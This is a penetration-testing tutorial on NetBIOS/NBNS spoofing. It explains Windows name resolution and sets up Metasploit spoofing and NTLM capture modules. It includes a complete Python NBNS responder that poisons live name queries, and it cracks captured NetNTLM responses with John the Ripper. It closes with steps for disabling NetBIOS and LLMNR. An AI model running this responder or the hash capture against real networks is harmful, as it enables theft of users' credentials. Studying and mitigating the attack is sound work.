NetBIOS / NBNS Spoofing

To many, this method of gaining access feels almost like cheating when you are on a customer's site performing a penetration test.
It is a quick and dirty way to get users' passwords without having to log in to anyone else's computer.
Simply sit down, plug in, and you're ready to go.
NetBIOS spoofing relies on a Windows machine following the process below to resolve a host name:

  1. Windows first checks whether the name is its own host name, then looks in its local hosts file.
  2. It then checks its DNS resolver cache to see whether the name has recently been resolved.
  3. If that fails, it sends a query to its configured DNS server(s).
  4. If the DNS server cannot resolve it, and the name is a valid NetBIOS name (a single label of 15 characters or fewer), the client checks its NetBIOS name cache and then asks its configured WINS server (if one is specified).
  5. If at this point the client has still not received a reply, it sends out a series of NetBIOS name query broadcasts on the local subnet. (On Windows Vista and later an LLMNR multicast query is sent first; it can be spoofed in exactly the same way.)
  6. Finally, if all else fails, it looks inside its LMHOSTS file.

You can see from the list that our attack does not come into play until the 5th stage. You may well be thinking that all the planets need to align for this to work, but you will be surprised how many hashes you can capture on a busy network. Plenty of everyday situations push a client through the first four steps with no answer and straight into the broadcasts of step 5, for instance:

  1. Clients running login scripts that map drives with net use against a short server name, especially one that has since been decommissioned or is not in DNS.
  2. Laptops brought in from other domains keep polling for their home printers and other resources that do not exist on this network, and every miss ends in a broadcast.
  3. Mistyped names such as googlecom are rejected by the DNS server and are then tried via NetBIOS.
  4. Modern browsers allow you to search from the address bar, so the browser has to decide whether the text is a host name or a query. If the string contains spaces it is obviously a search. If it has no spaces the browser does not know whether you want a server named "youtube" or a search for youtube, so it tries to resolve the name as well.
So, as you can see, quite a few factors bring stage 5 into play a lot sooner than you might expect.

NetBIOS name resolution is a broadcast: the client asks the whole subnet "who is FILESERVER1?", and, luckily for us, the protocol provides no verification of who sends the reply, so anyone can answer claiming to be fileserver1. The client trusts the first response it gets, connects to the attacker's SMB service and, because Windows performs single sign-on for SMB, authenticates automatically with the logged-on user's credentials. What the attacker receives is not the password hash itself but an NTLM challenge/response (NTLMv1 or NTLMv2; John the Ripper calls these formats netntlm and netntlmv2), computed from the user's NT hash and a server challenge that the attacker chose. It cannot be used directly as a credential, but it can be cracked offline against a wordlist.

First, we need to set up a few Metasploit auxiliary modules: auxiliary/spoof/nbns/nbns_response, which sends the forged replies, and auxiliary/server/capture/smb and auxiliary/server/capture/http_ntlm, which accept the connections that follow and record the NTLM challenge/responses.

$ msfconsole
Next, create a folder to hold the captured hashes. In a new terminal window, type:

$ mkdir /netbios
We now need to load the auxiliary modules and set their options so that our NetBIOS spoofing works: SPOOFIP on nbns_response is the address the forged replies advertise (your own IP), and JOHNPWFILE and CAINPWFILE on the two capture modules are the output file prefixes (point them under /netbios).

The resource script that does all of this is linked from the original post. Once you have it and have filled in your own IP, paste it into msfconsole.

Your computer is now actively answering NetBIOS requests. Now we wait for one.
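To make the "blindly trusts the reply" point concrete, here is a minimal NBNS responder that does the job of the nbns_response module: it parses an NBNS name query, builds a positive name query response pointing at the attacker's address, and can answer live queries on UDP/137. This is an added example of my own, not the Metasploit module's code or anything from the original post. The attacker address 192.0.2.10, the name FILESERVER1 and the query packet are all assumed/constructed for the example.

```python
import re
import socket
import struct
import sys
from typing import Optional, Tuple

# Added example: a minimal NBNS (NetBIOS Name Service, RFC 1002) responder.
# My own illustration of what auxiliary/spoof/nbns/nbns_response does; not that
# module's code. The address and names below are constructed for the example.

NBNS_PORT = 137
SPOOF_IP = "192.0.2.10"          # assumed attacker address (RFC 5737 test range)


def encode_nb_name(name: str, suffix: int = 0x20) -> bytes:
    """First-level encoding: pad the name to 15 bytes, append the 1-byte suffix
    (0x20 = File Server service), then write each nibble as 'A' + nibble."""
    raw = name.upper().ljust(15).encode("ascii") + bytes([suffix])
    return bytes(c for byte in raw for c in (0x41 + (byte >> 4), 0x41 + (byte & 0x0F)))


def decode_nb_name(encoded: bytes) -> Tuple[str, int]:
    """Inverse of encode_nb_name: 32 encoded bytes -> (name, suffix)."""
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii", "replace").rstrip(" \x00"), raw[15]


def build_query(txid: int, name: str, suffix: int = 0x20) -> bytes:
    """A name query as a Windows client broadcasts it (flags 0x0110: RD + B)."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    question = b"\x20" + encode_nb_name(name, suffix) + b"\x00" + struct.pack(">HH", 0x0020, 0x0001)
    return header + question


def parse_query(packet: bytes) -> Optional[Tuple[int, str, int]]:
    """Return (txid, name, suffix) for an NBNS name query; None for anything else."""
    if len(packet) < 50:
        return None
    txid, flags, qdcount = struct.unpack(">HHH", packet[:6])
    if (flags & 0x8000) or ((flags >> 11) & 0xF) != 0 or qdcount != 1:
        return None                       # a response, a non-query opcode, or malformed
    if packet[12] != 0x20 or packet[45] != 0x00:
        return None                       # question name must be one 32-byte label
    qtype, qclass = struct.unpack(">HH", packet[46:50])
    if (qtype, qclass) != (0x0020, 0x0001):   # NB record, IN class
        return None
    name, suffix = decode_nb_name(packet[13:45])
    return txid, name, suffix


def build_response(txid: int, name: str, suffix: int, spoof_ip: str, ttl: int = 165) -> bytes:
    """Positive name query response claiming that `name` lives at `spoof_ip`.
    Nothing in it proves the sender owns the name: there is no signature and no
    shared secret, only the transaction ID copied from the query."""
    header = struct.pack(">HHHHHH", txid, 0x8500, 0, 1, 0, 0)   # response, AA, RD
    rr_name = b"\x20" + encode_nb_name(name, suffix) + b"\x00"
    rdata = struct.pack(">H4s", 0x0000, socket.inet_aton(spoof_ip))   # NB_FLAGS (unique, B-node) + IPv4
    rr = rr_name + struct.pack(">HHIH", 0x0020, 0x0001, ttl, len(rdata)) + rdata
    return header + rr


def serve(spoof_ip: str = SPOOF_IP, name_filter: str = r".*") -> None:
    """Answer every query whose name matches name_filter on UDP/137 with spoof_ip,
    until interrupted. Needs root (port 137) and no nmbd/Samba bound to the port."""
    wanted = re.compile(name_filter, re.IGNORECASE)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("0.0.0.0", NBNS_PORT))
    while True:
        data, (src_ip, src_port) = sock.recvfrom(1024)
        parsed = parse_query(data)
        if parsed is None or not wanted.match(parsed[1]):
            continue
        txid, name, suffix = parsed
        sock.sendto(build_response(txid, name, suffix, spoof_ip), (src_ip, src_port))
        print(f"{src_ip} asked for {name} <{suffix:02X}>; answered with {spoof_ip}")


if __name__ == "__main__":
    serve(sys.argv[1] if len(sys.argv) > 1 else SPOOF_IP)
```

The name_filter argument plays the role of the module's REGEX option: answering only names you expect to be unresolvable (a dead file server, a mistyped name) is quieter than answering everything, because a forged reply for a name that does resolve races the legitimate owner and shows up in the victim's logs as a connection to the wrong host.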

Once a request arrives, the console output will look like this:

From here we can load the hash into either Cain or John the Ripper.

If you now browse to the /netbios/ folder, you should see some files.

These are the captured hashes, written in the formats Cain and John the Ripper expect. The JOHNPWFILE prefix produces separate files for NTLMv1 and NTLMv2 responses, with _netntlm and _netntlmv2 appended to the name.

To crack the NTLMv1 responses with John the Ripper, use the following command (for the _netntlmv2 file use --format=netntlmv2):

$ /pentest/passwords/john/john john._netntlm --format=netntlm --wordlist=/root/Desktop/wordlist/passwords.txt
After a while you will likely have the hash cracked. John has many more options, in particular wordlist mangling rules (--rules), that make the attack more effective.

Once a password is cracked, use the --show option to view the cracked passwords.

As you can see it has cracked one password already; it took roughly 3-5 seconds to crack this very predictable password.

username: boss
password: password
The idea here is that an everyday user will have a password you can crack in a couple of minutes.
The more hashes you capture, the more likely some of them will crack.


The fix is to stop clients from broadcasting NetBIOS name queries, that is, to disable NetBIOS over TCP/IP (NetBT). The setting lives in what I hope is a very familiar place that you may never have paid much attention to before.

According to Microsoft, NetBIOS has not been required for Active Directory since Windows 2000, which locates domain controllers through DNS rather than NetBIOS.
However, there are a few side effects.

One of the unexpected consequences of disabling NetBIOS completely on your network is how it affects trusts between forests.

Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest, so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trust, the forest trust, that lets users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is still used in the trust creation process, even though Microsoft has officially "deprecated" NetBIOS in versions of Windows from 2000 on. So if you disable NetBIOS on your domain controllers, you will not be able to establish a forest trust between two Windows Server 2003 forests.

But Windows Server 2003 is pretty old; as of writing we are generally on Windows Server 2012. So if you would like to disable NetBIOS on your servers but would be affected by the forest trust side effect, you should ideally upgrade and keep up with the times anyway. Alternatively, you can get away with, at the very least, disabling NetBIOS on your workstations. Bear in mind that this does not silence LLMNR, which Windows Vista and later try before NetBIOS and which an attacker can poison the same way; turn that off too, with the Group Policy setting Turn off multicast name resolution under Computer Configuration > Administrative Templates > Network > DNS Client.
See below for step by step instructions on disabling Netbios on workstations:

Windows XP, Windows Server 2003, and Windows 2000

  1. On the desktop, right-click My Network Places, and then click Properties.
  2. Right-click Local Area Connection, and then click Properties
  3. In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), click Advanced, and then click the WINS tab. Note: in Windows XP and Windows Server 2003 the list is called This connection uses the following items.
  4. Click Disable NetBIOS over TCP/IP, and then click OK three times.

For Windows Vista

  1. On the desktop, right-click Network, and then click Properties.
  2. Under Tasks, click Manage network connections.
  3. Right-click Local Area Connection, and then click Properties
  4. In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), click Advanced, and then click the WINS tab.
  5. Click Disable NetBIOS over TCP/IP, and then click OK three times.

For Windows 7

  1. Click Start, and then click Control Panel.
  2. Under Network and Internet, click View network status and tasks.
  3. Click Change adapter settings.
  4. Right-click Local Area Connection, and then click Properties.
  5. In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), click Advanced, and then click the WINS tab.
  6. Click Disable NetBIOS over TCP/IP, and then click OK three times.

If you would rather control this centrally, leave the adapter on Use NetBIOS setting from the DHCP server and set the Microsoft vendor-specific DHCP option 001 Microsoft Disable Netbios Option to 2 on each scope; choosing that radio button without the DHCP option in place leaves NetBIOS enabled. Either way the result on the client is the registry value NetbiosOptions = 2 under HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{adapter GUID} (0 means follow DHCP, 1 enabled, 2 disabled), which is the value to check when auditing. After the change, UDP ports 137 and 138 and TCP port 139 should no longer be open on that adapter.

